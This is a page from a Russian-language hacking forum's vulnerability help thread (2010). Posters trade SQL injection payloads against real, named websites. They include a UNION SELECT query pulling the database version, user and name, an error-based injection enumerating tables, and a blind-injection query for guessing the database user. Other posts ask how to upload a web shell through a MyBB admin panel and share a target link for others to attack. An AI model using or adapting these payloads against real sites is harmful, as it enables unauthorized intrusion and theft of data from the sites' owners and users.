HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1474 из 2438 « Первая < 474974137414241464 1470 1471 1472 1473 1474 1475 1476 1477 1478 1484152415741974 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #14731  
Старый 12.08.2010, 17:08
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию
Помогите достроить запрос чтоб при комменте не выдавал ошибку

site.ru/index.php?id=12--+

Цитата:
Сообщение от None  
Couldn't execute query AR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AS temp_orders ON fl_orders.Email_new = temp_orders.Email_new JOIN fl_product_or' at line 6
 
Ответить с цитированием

  #14732  
Старый 12.08.2010, 17:14
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию
Код:
Code:
site.ru/index.php?id=12 AS temp_orders ON fl_orders.Email_new = temp_orders.Email_new JOIN fl_product_or+--+
попробуй относительно этого крутить
 
Ответить с цитированием

  #14733  
Старый 12.08.2010, 17:23
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию
Цитата:
Сообщение от Seravin  
Seravin said:
Код:
Code:
site.ru/index.php?id=12 AS temp_orders ON fl_orders.Email_new = temp_orders.Email_new JOIN fl_product_or+--+
попробуй относительно этого крутить
Цитата:
Сообщение от None  
Couldn't execute query U: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AS temp_orders ON fl_orders.Email_new=temp_orders.Email_new JOIN fl_product_or -' at line 3
Вот ссылка, мне не жалко но если кто-то ковырнет раньше меня то поделитесь со всеми

http://www.flashloaded.com/cart/basket.php?action=Add&itemid=6587
 
Ответить с цитированием

  #14734  
Старый 12.08.2010, 22:04
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию
Цитата:
Сообщение от fl00der  
fl00der said:
http://zurnals.maminuklubs.lv/lat/sludinajumi/?cat=48%27
Тут вот подозрения на SQL inj, т.к. при подстановке ':
http://zurnals.maminuklubs.lv/lat/sludinajumi/?cat=48%27'
выбивает пустую страничку. Но, как я не бился, при всем остальном страничка грузится, как ни в чем не бывало.
Код:
Code:
http://zurnals.maminuklubs.lv/lat/sludinajumi/?cat=-48'+union+select+1,2,3,4,5,6,7,8,9,10,concat(0x3a,version(),user(),database(),0x3a),12,13,14,15--+
 
Ответить с цитированием

  #14735  
Старый 13.08.2010, 06:34
happygirl
Guest
Сообщений: n/a
Провел на форуме:
2597

Репутация: 0
По умолчанию
почему "substring" не показывают данные?

http://www.sudplanete.net/photo.php?menu=pers&no=8452+or+(1,2)=(select+count (0),concat((select+substring(table_name,1,10)+from +information_schema.tables limit 1,1),floor(rand(0)*2))from(information_schema.tabl es)group+by+2)--+
 
Ответить с цитированием

  #14736  
Старый 13.08.2010, 14:45
roddik
Познающий
Регистрация: 14.01.2009
Сообщений: 93
Провел на форуме:
244235

Репутация: 39
По умолчанию
Привет. Прочел конфиг апача, инклудятся файлы Include conf.d/*.conf, сервер redhat-linux-gnu, где по дефолту лежат конфиги виртуальных хостов?
 
Ответить с цитированием

  #14737  
Старый 13.08.2010, 20:57
Koren
Новичок
Регистрация: 11.07.2009
Сообщений: 3
Провел на форуме:
19069

Репутация: 0
По умолчанию
blind делаю в адресной строке запрос php?id=11+AND+ascii(lower(substring(user(),1,1)))> 115

долго очень перебирать имя юзера, можно ли через sipt

ускорить перебор? каков должен быть запрос в сипт?

(user(),{N1-115},1 или ?????
 
Ответить с цитированием

  #14738  
Старый 13.08.2010, 22:26
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831

Репутация: 34
По умолчанию
toolza 1.0 лучше всего для блинда будет
 
Ответить с цитированием

  #14739  
Старый 13.08.2010, 22:59
SENIA
Постоянный
Регистрация: 22.11.2008
Сообщений: 344
Провел на форуме:
3863128

Репутация: 570
Отправить сообщение для SENIA с помощью ICQ
По умолчанию
Можно ли залить шелл через админку mybb 1.4.13? если да,то как?
 
Ответить с цитированием

  #14740  
Старый 14.08.2010, 12:25
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131

Репутация: 74
По умолчанию
Помогите, пожалуйста, найти OpenX на сайте zurnals.maminuklubs.lv или он на верхнем поддомене, я уж обыскался, но не могу найти этот скрипт. Он там есть, версия 2.8.
 
Ответить с цитированием
Ответ
Страница 1474 из 2438 « Первая < 474974137414241464 1470 1471 1472 1473 1474 1475 1476 1477 1478 1484152415741974 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ